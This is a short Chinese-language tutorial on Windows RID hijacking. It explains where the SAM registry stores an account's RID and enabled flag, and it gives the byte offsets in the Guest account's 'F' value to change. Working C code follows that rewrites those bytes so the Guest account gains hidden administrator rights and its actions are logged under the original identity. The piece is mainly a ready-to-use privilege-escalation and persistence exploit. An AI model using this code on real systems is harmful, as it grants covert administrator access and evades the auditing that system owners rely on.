RID劫持

RID-hijack

RID Hijack简介

在windows系统内,使用rid区分用户组和用户账户,rid是安全标识符sid的一部分,每创建一个组或一个用户,都会往后递增一位,通常administrator的rid始终为500,而标准用户通常以1001开始。

Sebastian Castr发现可以通过修改注册表来劫持有效账户的RID,使guest成为管理员,同时进行活动的话会以原本的身份记录在日志内。

手工操作

windows内置访客账户guest的rid信息储存在一下键值对内。

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
0x1f5转换成十进制501

也可以通过wmic查询。

wmic useraccount where (name='Guest') get name,sid

通过RID在如下键值对内寻找账户的相关信息。

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5

找到如下注册表项的键值对“F",此键值对内存储着标识账户RID和是否开启的数值。

PS:需要system权限。

在"F"键值对偏移0x30的位置存储着RID,修改为0xF401(500)即可劫持RID。

偏移0x38确定账户是否启用(0X1502->关闭,0x1402->启用)。

更改这些值将启用启用来宾帐户(有时情况下一部分),并劫持提升的RID(本地管理员)。来宾帐户将具有管理员权限,但是该帐户仍然不会出现在本地管理员组中。

代码实现

由于powershell和bat的脚本在互联网上可以轻易找到,这里只给出c的版本。

在metasploit和empire内也有比较成熟的模块。

#include <Windows.h>
#include <stdio.h>
int main()
{
HKEY hKey = NULL;
PCHAR KeyAddr = NULL;
DWORD KeySize;
DWORD KeyType;
BYTE Buffer[0x50] = { 0 };
KeyAddr = (PCHAR)"SAM\\SAM\\Domains\\Account\\Users\\000001F5";
RegOpenKeyExA(HKEY_LOCAL_MACHINE, KeyAddr, 0, KEY_ALL_ACCESS, &hKey);
RegQueryValueExA(hKey, "F", NULL, &KeyType, (LPBYTE)&Buffer, &KeySize);
Buffer[0x30] = (BYTE)0xf4; //hijack rid
Buffer[0x38] = (BYTE)0x14; //enable guest
RegSetValueExA(hKey, "F",NULL, KeyType, Buffer, KeySize);
RegCloseKey(hKey);
return 0;
}

LINKS